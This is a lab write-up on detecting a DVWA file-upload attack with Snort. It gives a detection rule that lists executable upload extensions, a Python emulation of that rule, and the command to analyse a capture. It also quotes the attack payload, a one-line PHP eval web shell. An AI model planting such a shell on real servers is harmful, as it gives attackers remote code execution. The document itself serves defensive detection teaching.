Environment introduction
Physical machine: Win10 + Wireshark
Target machine: Win7 + phpStudy + DVWA
Means of attack
Upload a file called 1.php whose contents are <?php @eval($_POST['777']) ?>
Before uploading, start a Wireshark capture and filter the captured data so that the upload request is recorded.
Write the rule
alert tcp any any -> any any (msg:"DVWA-upload漏洞攻击"; flow:to_server,established; uricontent:"DVWA-master/vulnerabilities/upload"; fast_pattern:only; content:"name=|22|uploaded|22|"; content:"filename="; distance:0; pcre:"/filename[\s=]+?\x22.+?\.(php|phtml|html|php3|php5|jsp|asp|htm|war|phl|htaccess)/iP"; metadata:service http; sid:5; rev:1;)
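To see exactly what this rule fires on, here is an added Python model of its option chain (written for this page, not Snort's own matching engine or anything from the original post), run against constructed DVWA-style upload requests; the host address, boundary and file contents are made-up sample values.

```python
import re

# Strings taken from the rule above
URI_NEEDLE = b"DVWA-master/vulnerabilities/upload"  # uricontent
NAME_NEEDLE = b'name="uploaded"'                    # content:"name=|22|uploaded|22|"
FILENAME_NEEDLE = b"filename="                      # content:"filename="; distance:0
# The rule's pcre with /i; its /P modifier limits the match to the HTTP client
# body, which is mirrored below by searching the body only.
UPLOAD_RE = re.compile(
    rb'filename[\s=]+?\x22.+?\.(php|phtml|html|php3|php5|jsp|asp|htm|war|phl|htaccess)',
    re.IGNORECASE,
)


def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, uri, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    method, uri, _ = head.split(b"\r\n", 1)[0].split(b" ", 2)
    return method, uri, body


def rule_matches(raw: bytes) -> bool:
    """Emulate the rule's option chain on one request.
    flow:to_server,established needs TCP state and is not modelled here."""
    _, uri, body = parse_request(raw)
    if URI_NEEDLE not in uri:                      # uricontent
        return False
    pos = body.find(NAME_NEEDLE)                   # first content match
    if pos == -1:
        return False
    # distance:0 -> "filename=" must start after the end of the previous match
    if body.find(FILENAME_NEEDLE, pos + len(NAME_NEEDLE)) == -1:
        return False
    return UPLOAD_RE.search(body) is not None      # pcre over the client body


def build_request(uri: bytes, filename: bytes, file_body: bytes) -> bytes:
    """Constructed DVWA-style multipart upload (sample data, not a real capture)."""
    boundary = b"----ExampleBoundary1234"
    body = b"".join([
        b"--" + boundary + b'\r\nContent-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n100000\r\n',
        b"--" + boundary + b'\r\nContent-Disposition: form-data; name="uploaded"; filename="' + filename + b'"\r\n',
        b"Content-Type: application/octet-stream\r\n\r\n" + file_body + b"\r\n",
        b"--" + boundary + b'\r\nContent-Disposition: form-data; name="Upload"\r\n\r\nUpload\r\n',
        b"--" + boundary + b"--\r\n",
    ])
    head = (b"POST " + uri + b" HTTP/1.1\r\nHost: 192.0.2.10\r\n"
            + b"Content-Type: multipart/form-data; boundary=" + boundary + b"\r\n"
            + b"Content-Length: " + str(len(body)).encode() + b"\r\n")
    return head + b"\r\n" + body
```

With this model, 1.php and shell.PHTML uploaded to the DVWA upload URI match while cat.jpg and the same 1.php sent to a different URI do not. Note that sid values below 1,000,000 are reserved for official Snort rules, so a local rule like this one is conventionally given a sid of 1000000 or higher.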
Analysis
Run Snort against the saved capture from a PowerShell terminal:
snort -de -c C:\Snort\etc\snort.conf -l C:\Snort\log -r C:\dvwa抓包\file-upload.pcapng